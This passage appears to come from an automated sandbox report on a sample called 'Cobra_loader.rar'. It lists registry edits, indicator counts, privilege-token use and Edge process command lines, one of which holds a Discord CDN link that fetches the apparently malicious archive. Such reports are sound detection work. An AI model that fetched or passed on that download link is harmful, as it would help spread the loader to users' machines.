Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{74AA02CD-5826-40AB-A899-A0E8F4B52951}	msedge.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll"	7z2405-x64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip	7z2405-x64.exe

NTFS ADS 2 IoCs

Processes:

msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 648720.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 160669.crdownload:SmartScreen	msedge.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

220 EXCEL.EXE

pid	process
220	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exetaskmgr.exemsedge.exemsedge.exepowershell.exe

pid	process
3156	msedge.exe
3156	msedge.exe
1704	msedge.exe
1704	msedge.exe
4984	identity_helper.exe
4984	identity_helper.exe
2540	msedge.exe
2540	msedge.exe
2736	msedge.exe
2736	msedge.exe
1544	msedge.exe
1544	msedge.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
6024	msedge.exe
5816	msedge.exe
5816	msedge.exe
5780	powershell.exe
5780	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

Processes:

7z2405-x64.exeOpenWith.exe7zFM.exetaskmgr.exeOpenWith.exeOpenWith.exe

pid process

640 7z2405-x64.exe
1688 OpenWith.exe
5020 7zFM.exe
5896 taskmgr.exe
2200 OpenWith.exe
5740 OpenWith.exe

pid	process
640	7z2405-x64.exe
1688	OpenWith.exe
5020	7zFM.exe
5896	taskmgr.exe
2200	OpenWith.exe
5740	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 35 IoCs

Processes:

msedge.exemsedge.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe
4052	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskmgr.exe7zFM.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exetasklist.exeWMIC.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	544	taskmgr.exe
Token: SeSystemProfilePrivilege	544	taskmgr.exe
Token: SeCreateGlobalPrivilege	544	taskmgr.exe
Token: 33	544	taskmgr.exe
Token: SeIncBasePriorityPrivilege	544	taskmgr.exe
Token: SeRestorePrivilege	5020	7zFM.exe
Token: 35	5020	7zFM.exe
Token: SeSecurityPrivilege	5020	7zFM.exe
Token: SeDebugPrivilege	5780	powershell.exe
Token: SeDebugPrivilege	5380	powershell.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeDebugPrivilege	2492	tasklist.exe
Token: SeDebugPrivilege	544	tasklist.exe
Token: SeDebugPrivilege	4420	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	5452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe
Token: SeShutdownPrivilege	4816	WMIC.exe
Token: SeDebugPrivilege	4816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4816	WMIC.exe
Token: SeRemoteShutdownPrivilege	4816	WMIC.exe
Token: SeUndockPrivilege	4816	WMIC.exe
Token: SeManageVolumePrivilege	4816	WMIC.exe
Token: 33	4816	WMIC.exe
Token: 34	4816	WMIC.exe
Token: 35	4816	WMIC.exe
Token: 36	4816	WMIC.exe
Token: SeDebugPrivilege	5728	taskkill.exe
Token: SeDebugPrivilege	6000	taskkill.exe
Token: SeDebugPrivilege	5220	taskkill.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	5472	taskkill.exe
Token: SeDebugPrivilege	5464	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

msedge.exetaskmgr.exe

pid	process
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
1704	msedge.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe
544	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

winrar-x64-701.exewinrar-x64-701.exewinrar-x64-701.exeOpenWith.exeOpenWith.exe7z2405-x64.exe7z2405-x64.exeOpenWith.exeEXCEL.EXE

pid	process
5256	winrar-x64-701.exe
2332	winrar-x64-701.exe
2332	winrar-x64-701.exe
2332	winrar-x64-701.exe
5256	winrar-x64-701.exe
5256	winrar-x64-701.exe
3424	winrar-x64-701.exe
3424	winrar-x64-701.exe
3424	winrar-x64-701.exe
4800	OpenWith.exe
836	OpenWith.exe
836	OpenWith.exe
836	OpenWith.exe
5104	7z2405-x64.exe
640	7z2405-x64.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
1688	OpenWith.exe
220	EXCEL.EXE
220	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 1704 wrote to memory of 3316	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3316	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1488	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3156	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 3156	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe
PID 1704 wrote to memory of 1664	1704	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/778517571808919565/1243615426152235119/Cobra_loader.rar?ex=66521e9e&is=6650cd1e&hm=8b1bc83aed9bd36d7d476586142ac81c48bb6dccaa2e2ad9de6d55873858cf49&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffceba246f8,0x7ffceba24708,0x7ffceba24718
2⤵
PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
2⤵
PID:1488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
2⤵
PID:1664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
2⤵
PID:4636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
2⤵
PID:5016

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
2⤵
PID:3740

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
2⤵
PID:4852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
2⤵
PID:1352

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5644 /prefetch:8
2⤵
PID:764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
2⤵
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5972 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
2⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6064 /prefetch:1
2⤵
PID:2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
2⤵
PID:5088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
2⤵
PID:3668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6208 /prefetch:8
2⤵
PID:2196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6200 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2736

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
2⤵
PID:5316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
2⤵
PID:5468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
2⤵
PID:5524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
2⤵
PID:5912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6764 /prefetch:8
2⤵
PID:6020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6832 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1544

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5256

C:\Users\Admin\Downloads\winrar-x64-701.exe
"C:\Users\Admin\Downloads\winrar-x64-701.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,12354871103883070234,8022113506808311275,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1
2⤵
PID:5376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
